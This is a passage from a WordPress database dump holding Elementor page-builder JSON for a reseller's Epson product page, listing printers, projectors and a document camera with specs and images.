src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-AL-M8100DN-.png\\\" alt=\\\"\\\" width=\\\"256\\\" height=\\\"144\\\" \\/><br><br>\\n\\nUnleash remarkable efficiency to your workflow. Powered by a 600Mhz dual core processor, the WorkForce AL-8100DN delivers quality A3 and A4 prints with swift speeds of up to 40ppm and is packed with 1GB RAM for faster processing of multiple print jobs.\\n<ul>\\n \\t<li>1200 x 1200 dpi<\\/li>\\n \\t<li>Print speed up to 40 ppm<\\/li>\\n \\t<li>Epson iPrint<\\/li>\\n \\t<li>Ethernet<\\/li>\\n \\t<li>4 optional cassette trays<\\/li>\\n<\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"3432510\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"70\",\"bottom\":\"70\",\"left\":\"70\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3590c0\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7139e3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"77f919a\",\"elType\":\"widget\",\"settings\":{\"title\":\"POS PRINTER\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6011ab1\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"751b93e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"14d70f4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson TM-H6000IV\\u00a0<\\/strong><\\/h4><p><img class=\\\"wp-image-2428 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-H6000IV.png\\\" alt=\\\"\\\" width=\\\"224\\\" height=\\\"125\\\" \\/><\\/p><p>The Epson multifunction POS printer TM-H6000IV, features everything retailers need from fast receipt printing and check processing to best-in-class reliability.<\\/p><ul><li>Thermal &amp; Dot Output<\\/li><li>Speed: Up to 300mm\\/sec<\\/li><li>Check printing<\\/li><li>Bi-directional printing<\\/li><li>Supports\\u00a0slip printing, validation and endorsement print<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ecb5d15\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"-2\",\"right\":\"-2\",\"bottom\":\"-2\",\"left\":\"-2\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"48313a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"04c8d3f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson TM-T88V-i\\u00a0<\\/strong>\\n\\n<img class=\\\"alignnone wp-image-2429\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-T88V-i.png\\\" alt=\\\"\\\" width=\\\"243\\\" height=\\\"137\\\" \\/><\\/h4>\\nCreate a world of possibilities with TM-T88V-i Intelligent Solution. Equipped with cloud and web-capabilities, you\'ll have access to a variety of intelligent functions delivered by a compact, space-saving printer that fits easily into your business.\\n<ul>\\n \\t<li>Printing speed of up to 300mm\\/second<\\/li>\\n \\t<li>20 million lines for printer mechanism<\\/li>\\n \\t<li>Up to 2 million for auto-cutter<\\/li>\\n \\t<li>LAN, Serial, USB 2.0 (Type A) x 4<\\/li>\\n \\t<li>Control peripherals easily<\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a458653\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"693238f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson TM-T70II\\u00a0<\\/strong><br \\/><br \\/><img class=\\\"alignnone wp-image-2430\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-T70II.png\\\" alt=\\\"\\\" width=\\\"254\\\" height=\\\"143\\\" \\/><br \\/><br \\/><\\/h4><p>The Epson\'s TM-T70II is the smallest in class receipt printer with a full frontal operation.<\\/p><ul><li>Print method: Thermal line printing<\\/li><li>Width: 79\\u00a0\\u00b1\\u00a00.5 mm<\\/li><li>Print Speed: Up to 250 mm\\/ sec<\\/li><li>Auto-cutter feature<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c9f74e5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"37\",\"right\":\"37\",\"bottom\":\"37\",\"left\":\"37\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"633089e\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e7998e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ca5c009\",\"elType\":\"widget\",\"settings\":{\"title\":\"PHOTO PRINTER\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9e7182b\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"7eee589\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c63255\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson L1800 A3 Photo Ink Tank Printer<\\/strong><\\/p><p><img class=\\\"alignnone size-full wp-image-2431\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L1800-Printer.png\\\" alt=\\\"\\\" width=\\\"550\\\" height=\\\"310\\\" \\/><\\/p><p>In creating the next wave of printing innovation, Epson introduces the worlds first truly affordable 6-colour A3+ original ink tank system printer.<\\/p><ul><li>Yield of up to 1,500 4R photos<\\/li><li>Print speed up to 15ppm<\\/li><li>High-yield ink bottles<\\/li><li>1-year warranty or 9,000 prints<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4abe3ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9645bf2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson L850 Printer\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2432\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L850-Printer.png\\\" alt=\\\"\\\" width=\\\"261\\\" height=\\\"147\\\" \\/><\\/p><p>Imaging enthusiasts and professionals can look forward to the 6-colour ink tank system, presenting vibrant borderless prints and unrivalled performance at a remarkably low cost through this 3-in-1 photo printer.<\\/p><ul><li>High-yield ink bottles<\\/li><li>2.7 colour LCD screen<\\/li><li>Direct printing via memory card slot, USB port and PictBridge<\\/li><li>CD\\/DVD printing<\\/li><li>Warranty of 1 year or 3,000 photo prints, whichever comes first<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"07c207b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8ce4aa3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson L805 Printer\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2433\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L805-Printer-.png\\\" alt=\\\"\\\" width=\\\"240\\\" height=\\\"135\\\" \\/><\\/p><p>The L805s integrated Wi-Fi support and expanded colour gamut of 6 inks brings you ease of printing from your mobile devices over a wireless network so you can print low-cost, lab-quality photos at your convenience.<\\/p><ul><li>Yield of Up to 1,800 4R photos<\\/li><li>Lowest Printing Costs<\\/li><li>Wi-Fi &amp; Epson iPrint<\\/li><li>CD\\/DVD Printing Capability<\\/li><li>1 year or 3,000 prints warranty<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"65279bf\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c65e6e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"57b8f7e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Projectors for Work\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bbe338f\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"4e4173d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"1c6bf5d\",\"elType\":\"widget\",\"settings\":{\"title\":\"CORPORATE AND EDUCATION\\u00a0\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7e9242e\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"61d6693\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"bd3c8b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-2055<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2434\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-2055.png\\\" alt=\\\"\\\" width=\\\"245\\\" height=\\\"163\\\" \\/><\\/p><p>Leave the lights on and take control whether in the meeting room or classroom. Epson\\u2019s EB-2055 projector is engineered to shine outstandingly even in well-lit environments to enrich your presentation experience. Your brilliant presentations are made even better and more convenient with the new gesture-control function that allows you to navigate between your slides without the use of a peripheral device.<\\/p><ul><li>XGA Resolution<\\/li><li>White and Colour Light Output at 5,000 lumens<\\/li><li>Gesture Presenter<\\/li><li>Multi-PC Projection<\\/li><li>2 x HDMI<\\/li><li>Split Screen<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a9b5eee\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe4d6fd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-2142W<\\/strong>\\u00a0<img class=\\\"alignnone wp-image-2435\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-2142W.jpg\\\" alt=\\\"\\\" width=\\\"245\\\" height=\\\"138\\\" \\/><\\/p><p>Enjoy success and unparalleled performance with Epson business projectors. Fully maximise your office space and experience a variety of connectivity options for your ultimate convenience. Along with long lamp-life and maintenance cycles, potential for saving costs and improving energy efficiency is now made possible for you. Every component is skillfully innovated with attention to detail in mind, including the integrated 3LCD technology that will provide you with stunning colour brightness for quality images.<\\/p><ul><li>White and Colour Brightness at 4,200lm<\\/li><li>WXGA Resolution<\\/li><li>12000 hours lamp life in eco-mode<\\/li><li>MHL-enabled<\\/li><li>Multi-PC Projection<\\/li><li>Horizontal Keystone Slider<\\/li><li>Miracast<sup>\\u00ae<\\/sup><\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<span style=\\\"font-size: 10.5px;\\\"><br \\/><\\/span><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"24b65ae\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a26a32f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-L500W\\u00a0<\\/strong><img class=\\\"wp-image-2436 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-L500W.jpg\\\" alt=\\\"\\\" width=\\\"251\\\" height=\\\"142\\\" \\/><\\/p><p>The compact, affordable EB-L500W laser projector delivers powerful performance for education and business applications. Get bright, vivid images with 5,000 lumens colour\\/white brightness. This wireless projector also offers WXGA resolution and Full HD support. Featuring breakthrough laser technology, it delivers a laser light source of up to 20,000 hours. And, it offers virtually maintenance-free operation for the life of the optical engine. Plus, it features a Dynamic contrast ratio of up to 2,500,000:1. It also includes wireless networking with enterprise-level security, and advanced installation features.<\\/p><ul><li>5,000 lumens colour\\/white brightness<sup>\\u00a0<\\/sup><\\/li><li>Colourful WXGA; up to 2,500,000:1 Dynamic contrast ratio<\\/li><li>Laser light source of up to 20,000 hours<\\/li><li>Virtually maintenance-free for optical engine life<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cd625e2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8750887\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c4ec64b\",\"elType\":\"widget\",\"settings\":{\"title\":\"ACCENT LIGHTING LASER PROJECTORS\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5f02a57\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"993393a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e46d09c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson LightScene EV-105<\\/strong><\\/p><p><img class=\\\"wp-image-2437 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-LightScene-EV-105.jpg\\\" alt=\\\"\\\" width=\\\"263\\\" height=\\\"176\\\" \\/><\\/p><p>Create stunning visual displays and immersive environments with the LightScene EV-105, the cutting-edge digital signage solution from Epson. A convergence of lighting and display technology, LightScene laser projectors captivate audiences by simultaneously illuminating and projecting on virtually any surface or material, unleashing dynamic, experiential content for digital art, commercial signage and d\\u00e9cor applications. Designed to blend in discreetly to any setting \\u2014 from retail, hospitality and event spaces to showrooms and museums \\u2014 LightScene EV-105 offers a sleek, black spotlight design, with an array of configuration, mounting and programming options.<\\/p><ul><li>Laser projector for digital art and signage<\\/li><li>Seamlessly blends into virtually any environment<\\/li><li>Up to 20,000 hours of virtually maintenance-free operation<\\/li><li>360-degree mounting: floors, walls or ceilings<\\/li><li>Remote management and control tools<\\/li><li>Best New Award Overall<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b9132fb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"5a3decf\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ccb5acc\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"45f89fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e7ec2bf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>ULTRA PORTABLE<\\/h3><p><strong>Epson EB-1785W\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2438\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-1785W.png\\\" alt=\\\"\\\" width=\\\"236\\\" height=\\\"133\\\" \\/><\\/p><p>The Epson EB-1785W packs superior imaging quality along with a suite of connectivity and usability features into a body weighing only 1.83kg and 44mm slim. Wirelessly connect your smart devices to the projector via Wi-Fi, Miracast, iProjection application or NFC technology. The EB-1785W comes with Gesture Presenter technology, which allows you to transit between slides without a clicker. Lastly, with Epson\'s 3LCD technology that delivers up to 3 times wider colour gamut and brightness, you can astound audiences anywhere you go.<\\/p><ul><li>White Light Output 3,200 lumens, Colour Light Output 3,200 lumens<\\/li><li>WXGA Resolution<\\/li><li>Real-Time Auto Keystone Correction<\\/li><li>Split Screen Projection<\\/li><li>Hassle-Free Presentation with USB 3-in-1 Display Feature and Epson iProjection<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1914d98\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b5f42fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"e3f8c24\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d81ddc4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"890a1d6\",\"elType\":\"widget\",\"settings\":{\"title\":\"INTERACTIVE\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c314a77\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"fbcb210\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1897c27\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-536Wi\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2439\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-536Wi.png\\\" alt=\\\"\\\" width=\\\"242\\\" height=\\\"136\\\" \\/><\\/p><p>Project large screen sizes even at close range and make your presentations larger-than-life with Epson EB-536Wi projector.<\\/p><ul><li>White and Colour Brightness at 3,400lm<\\/li><li>WXGA Resolution<\\/li><li>Multi-PC projection<\\/li><li>HDMI Connectivity<\\/li><li>Pen Interactivity<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a597712\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d315157\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson 595Wi\\/585Wi\\/575Wi<\\/strong>\\u00a0<img class=\\\"alignnone wp-image-2440\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-595Wi.png\\\" alt=\\\"\\\" width=\\\"276\\\" height=\\\"155\\\" \\/><\\/p><p>With the finger-touch interactive function and PC-free annotation, you can easily transform any surface into an interactive environment so everyone can throw their ideas on the table.<\\/p><ul><li>WXGA Resolution<\\/li><li>White and Colour Brightness at 3,300lm<\\/li><li>Multi-PC projection<\\/li><li>HDMI Connectivity x2<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"de8ca10\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"61ea7aa\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e5676d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"281e34f\",\"elType\":\"widget\",\"settings\":{\"title\":\"HIGH BRIGHTNESS\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a49451\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"f301a8e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e7e2436\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-L1405UNL\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2441\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/EB-L1405UNL.png\\\" alt=\\\"\\\" width=\\\"207\\\" height=\\\"117\\\" \\/><\\/p><p>The Epson EB-L1405U projector is designed to deliver unyielding laser performance, from any position to most surfaces, up to 20,000\\u00a0long lasting hours maintenance-free.<\\/p><ul><li>White and Colour Brightness at 8,000lm<\\/li><li>WUXGA (1920 x 1200)<\\/li><li>Edge-blending to create large panoramic images<\\/li><li>Curve and corner wall projection<\\/li><li>HDBaseT<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"dd3bc89\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6d9f7b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-G7400UNL\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2442\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-G7400UNL.png\\\" alt=\\\"\\\" width=\\\"205\\\" height=\\\"116\\\" \\/><\\/p><p>Epson high brightness EB-G7400U projector presents a new perspective on clarity, durability, and versatility. With the advanced C2Fine\\u2122 and 4K Enhancement Technology, projections are brought to life with vibrant colours in extreme resolution and vividness. Overcome the limitations of space constraints and project large and uncompromised images through the projector\\u2019s astoundingly short throw ratio of 0.35*.<\\/p><p><em>* With optional ELPLX01 zero offset ultra-short throw lens.<\\/em><\\/p><ul><li>High Brightness<\\/li><li>Beyond Full HD Resolution<\\/li><li>Powered Lens<\\/li><li>Portrait Projection<\\/li><li>Flexible Installation<\\/li><li>Edge Blending<\\/li><li>Point Correction<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2860f60\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"abe0604\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-Z10000U\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2443\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-Z10000U.png\\\" alt=\\\"\\\" width=\\\"208\\\" height=\\\"117\\\" \\/><\\/p><p>Discover a powerful way to impress your audience the EB-Z10000U high brightness business projector gives you stunning, high-definition images with its 3LCD technology.<\\/p><ul><li>White and Colour Brightness at 10,000\\u00a0lm<\\/li><li>WUXGA resolution<\\/li><li>High Reliability and Durability<\\/li><li>Suitable for 24\\/7 usage<\\/li><li>Flexible projection angles and installations<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6e2f23c\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"1be2016\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ccccf17\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>DOCUMENT CAMERAS<\\/h3><p><strong>Document Camera ELPDC21\\u00a0<\\/strong><img src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Document-Camera-ELPDC21.jpg\\\" alt=\\\"\\\" width=\\\"206\\\" height=\\\"137\\\" \\/><\\/p><p>Cut through the hassle, and get straight to your presentation. Epsons series of document cameras not only captures details with Full HD resolution, its versatile connectivity also gives you great functionality.<\\/p><ul><li>Pixels: 2MP (1920 x 1080 pixels)<\\/li><li>Camera Sensor: 1\\/2.7 inch CMOS Sensor<\\/li><li>Resolution: Up to Full HD (1080p)<\\/li><li>Zoom: 10x Digital Zoom, 12x Optical Zoom<\\/li><li>Weight: Approx 3.0kg<\\/li><\\/ul><p>[maxbutton id=\\\"12\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"d5e60a0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b6a1050\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(7930,3476,'_elementor_version','2.5.14'),(8666,3665,'_wp_attached_file','2019/10/Dell-PNG-1.png'),(7933,3477,'_wp_page_template','template-fullwidth.php'),(7934,3477,'_elementor_edit_mode','builder'),(7935,3477,'_elementor_template_type','post'),(7936,3477,'_elementor_data','[{\"id\":\"0bcf275\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"829ac8b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2449815\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>As a global technology leader, Epson creates and delivers technology solutions for businesses and consumers, from inkjet printers and digital printing systems to 3LCD projectors, smart glasses, sensing systems and industrial robots. The company is focused on driving innovations and exceeding customer expectations in inkjet, visual communications, wearables and robotics.<\\/p><h2>Printers for Work<\\/h2><p>Epson has the best printers for your business requirements regardless documents, photos, receipts, large-formats, labels, or even apparels.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2698f52\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"93fa1d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f872ca9\",\"elType\":\"widget\",\"settings\":{\"title\":\"BUSINESS INKJET PRINTER\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2a74bb0\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"245ffff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"12a92f5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce Enterprise WF-C17590\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2417\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-Enterprise-WF-C17590.jpg\\\" alt=\\\"\\\" width=\\\"366\\\" height=\\\"207\\\" \\/><\\/p><p>Our massive investment in revolutionary technologies enables us to pay attention to every minute detail. PrecisionCore\\u2122, our next generation, high-density printhead, takes a great leap forward in enterprise printing. Epson WorkForce Enterprise WF-C17590 has arrived, giving you exactly what you need: superior quality, excellent connectivity and prints at lightning fast speed.<\\/p><ul><li>4-in-1 Network MFP: Print | Copy | Scan | Fax<\\/li><li>Ink: DURABrite<sup>TM<\\/sup>\\u00a0Pro pigment ink cartridges<\\/li><li>ISO Print Speed: 75 ISO ppm (black\\/colour) simplex\\/duplex<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"d99a531\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"51d6ae3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"3a12efc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ffeb9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce Pro WF-C5290\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2418\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-Pro-WF-C5290.png\\\" alt=\\\"\\\" width=\\\"378\\\" 